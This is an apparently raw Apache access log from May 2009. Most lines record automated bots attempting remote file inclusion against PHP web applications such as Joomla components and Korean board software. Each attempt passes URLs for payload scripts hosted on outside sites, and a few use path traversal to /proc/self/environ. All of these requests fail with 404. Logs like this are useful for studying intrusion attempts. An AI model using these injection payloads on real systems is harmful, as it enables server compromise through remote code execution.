217.160.4.250 - - [14/May/2009:05:37:23 -0500] "GET ///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:05:37:23 -0500] "GET /logs///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:05:37:23 -0500] "GET /logs/access_log.1237334400///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:05:37:23 -0500] "GET /logs/access_log.1231545600///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
69.94.30.156 - - [14/May/2009:05:39:35 -0500] "GET /logs//admin/index.php?_shop_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:05:39:35 -0500] "GET //admin/index.php?_shop_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:05:45:43 -0500] "GET /logs/access_log.1228089600 HTTP/1.1" 200 12962 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.52.130.1 - - [14/May/2009:05:46:06 -0500] "GET /errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.52.130.1 - - [14/May/2009:05:46:07 -0500] "GET /logs/access_log.1240185600/errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.52.130.1 - - [14/May/2009:05:46:07 -0500] "GET /logs/errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.52.130.1 - - [14/May/2009:05:46:11 -0500] "GET /logs/access_log.1238630400/errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:05:50:09 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:05:50:09 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:05:50:09 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:05:50:38 -0500] "GET /logs/access_log.1240617600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:05:50:58 -0500] "GET /logs/access_log.1231113600 HTTP/1.1" 200 105650 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.56.98 - - [14/May/2009:05:55:08 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 314 "-""libwww-perl/5.48"
69.94.56.98 - - [14/May/2009:05:55:08 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 314 "-""libwww-perl/5.48"
69.94.56.98 - - [14/May/2009:05:55:09 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 309 "-""libwww-perl/5.48"
69.94.56.98 - - [14/May/2009:05:55:09 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 309 "-""libwww-perl/5.48"
216.117.191.71 - - [14/May/2009:05:55:25 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
216.117.191.71 - - [14/May/2009:05:55:26 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
69.94.30.156 - - [14/May/2009:05:55:58 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:05:55:59 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:05:56:12 -0500] "GET /logs/access_log.1230336000 HTTP/1.1" 200 100565 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.172.113.201 - - [14/May/2009:05:56:15 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
69.172.113.201 - - [14/May/2009:05:56:15 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
122.153.212.195 - - [14/May/2009:05:56:38 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:05:56:43 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:05:56:47 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:05:58:09 -0500] "GET /logs/access_log.1240617600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.94.56.98 - - [14/May/2009:05:58:10 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 305 "-""libwww-perl/5.48"
69.94.56.98 - - [14/May/2009:05:58:10 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 300 "-""libwww-perl/5.48"
69.94.56.98 - - [14/May/2009:05:58:20 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 305 "-""libwww-perl/5.48"
69.94.56.98 - - [14/May/2009:05:58:20 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 300 "-""libwww-perl/5.48"
77.221.130.19 - - [14/May/2009:06:00:43 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:06:00:43 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:06:01:33 -0500] "GET /logs/access_log.1229472000 HTTP/1.1" 200 14129 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.5 - - [14/May/2009:06:06:14 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
77.221.130.5 - - [14/May/2009:06:06:14 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
77.221.130.5 - - [14/May/2009:06:06:14 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
77.221.130.5 - - [14/May/2009:06:06:18 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:06:06:47 -0500] "GET /logs/access_log.1228003200 HTTP/1.1" 200 19127 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.114.112.155 - - [14/May/2009:06:07:11 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
203.114.112.155 - - [14/May/2009:06:07:11 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.114.112.155 - - [14/May/2009:06:07:11 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:06:08:04 -0500] "GET /logs/access_log.1213056000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.19 - - [14/May/2009:06:09:20 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:06:09:20 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
74.52.164.18 - - [14/May/2009:06:10:55 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=ftp://deals:qwerty831.9.152.46/public_html/v6id.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
74.52.164.18 - - [14/May/2009:06:10:55 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://deals:qwerty831.9.152.46/public_html/v6id.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
66.249.67.180 - - [14/May/2009:06:12:11 -0500] "GET /logs/access_log.1229558400 HTTP/1.1" 200 29517 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.52.164.18 - - [14/May/2009:06:12:51 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://deals:qwerty831.9.152.46/public_html/v6id.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
74.52.164.18 - - [14/May/2009:06:12:51 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=ftp://deals:qwerty831.9.152.46/public_html/v6id.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
66.249.67.180 - - [14/May/2009:06:17:22 -0500] "GET /logs/access_log.1229990400 HTTP/1.1" 200 112089 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.1.64.133 - - [14/May/2009:06:19:23 -0500] "GET //install/index.php?step=2&language=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 301 "-""XXXXXX"
218.1.64.133 - - [14/May/2009:06:19:23 -0500] "GET /logs//install/index.php?step=2&language=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 306 "-""XXXXXX"
218.1.64.133 - - [14/May/2009:06:19:26 -0500] "GET /logs//install/index.php?step=2&language=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""XXXXXX"
218.1.64.133 - - [14/May/2009:06:19:26 -0500] "GET //install/index.php?step=2&language=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""XXXXXX"
66.232.102.70 - - [14/May/2009:06:21:29 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.232.102.70 - - [14/May/2009:06:21:29 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.232.102.70 - - [14/May/2009:06:21:29 -0500] "GET /logs/access_log.1239926400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:06:22:45 -0500] "GET /logs/access_log.1229299200 HTTP/1.1" 200 26829 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.160.4.250 - - [14/May/2009:06:24:50 -0500] "GET /logs///index.php?option=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:06:24:50 -0500] "GET ///index.php?option=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:06:24:50 -0500] "GET /logs/access_log.1239494400///index.php?option=http://largeface.com/gnuboard4/gnus/fxid.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:06:28:01 -0500] "GET /logs/access_log.1229817600 HTTP/1.1" 200 72040 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
168.143.19.89 - - [14/May/2009:06:28:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=ftp://deals:qwerty831.9.152.46/public_html/v6id.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
168.143.19.89 - - [14/May/2009:06:28:14 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://deals:qwerty831.9.152.46/public_html/v6id.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
217.160.4.250 - - [14/May/2009:06:30:10 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
217.160.4.250 - - [14/May/2009:06:30:10 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
217.160.4.250 - - [14/May/2009:06:31:57 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
217.160.4.250 - - [14/May/2009:06:31:57 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
217.160.4.250 - - [14/May/2009:06:32:34 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
217.160.4.250 - - [14/May/2009:06:32:35 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
217.160.4.250 - - [14/May/2009:06:33:07 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
217.160.4.250 - - [14/May/2009:06:33:08 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:06:33:11 -0500] "GET /logs/access_log.1228780800 HTTP/1.1" 200 16071 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
75.119.201.5 - - [14/May/2009:06:34:09 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
75.119.201.5 - - [14/May/2009:06:34:09 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
75.119.201.5 - - [14/May/2009:06:34:09 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
75.119.201.5 - - [14/May/2009:06:34:09 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
202.177.22.67 - - [14/May/2009:06:34:15 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
202.177.22.67 - - [14/May/2009:06:34:15 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
202.177.22.67 - - [14/May/2009:06:34:15 -0500] "GET /logs/access_log.1240185600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
202.177.22.67 - - [14/May/2009:06:34:20 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:06:37:43 -0500] "GET ///skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:06:37:43 -0500] "GET /logs///skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:06:37:43 -0500] "GET /logs/access_log.1230422400///skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:06:38:40 -0500] "GET /logs/access_log.1227484800 HTTP/1.1" 200 22925 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.217.216.86 - - [14/May/2009:06:38:48 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cluboftraders.de/impex/kontol.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.826"
124.217.216.86 - - [14/May/2009:06:38:48 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cluboftraders.de/impex/kontol.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.826"
85.92.68.111 - - [14/May/2009:06:42:20 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.92.68.111 - - [14/May/2009:06:42:20 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.92.68.111 - - [14/May/2009:06:42:20 -0500] "GET /logs/access_log.1240185600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.92.68.111 - - [14/May/2009:06:42:30 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:06:43:49 -0500] "GET /logs/access_log.1230854400 HTTP/1.1" 200 136908 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.203.43.67 - - [14/May/2009:06:44:18 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.203.43.67 - - [14/May/2009:06:44:18 -0500] "GET //skin/zero_vote/error.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
122.203.43.67 - - [14/May/2009:06:44:21 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
122.203.43.67 - - [14/May/2009:06:44:30 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.203.43.67 - - [14/May/2009:06:44:30 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
122.203.43.67 - - [14/May/2009:06:44:30 -0500] "GET //skin/zero_vote/error.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
122.203.43.67 - - [14/May/2009:06:44:56 -0500] "GET //skin/zero_vote/error.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
122.203.43.67 - - [14/May/2009:06:44:57 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.203.43.67 - - [14/May/2009:06:44:57 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:06:44:59 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:06:44:59 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:06:44:59 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:06:44:59 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 343 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:06:45:02 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:06:45:02 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 343 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:06:45:02 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:06:45:02 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 365 "-""Mozilla/5.0"
122.203.43.67 - - [14/May/2009:06:45:22 -0500] "GET /logs/access_log.1230595200//skin/zero_vote/error.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.203.43.67 - - [14/May/2009:06:45:37 -0500] "GET /logs/access_log.1230595200//skin/zero_vote/error.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.203.43.67 - - [14/May/2009:06:46:10 -0500] "GET /logs/access_log.1230595200//skin/zero_vote/error.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:06:46:53 -0500] "GET /logs/main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:06:46:53 -0500] "GET /main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:06:46:53 -0500] "GET /logs/access_log.1236384000/main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:06:46:53 -0500] "GET /logs/main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:06:46:53 -0500] "GET /main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:06:46:53 -0500] "GET /logs/access_log.1236384000/main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:06:46:57 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:06:46:57 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:06:46:57 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:06:46:57 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
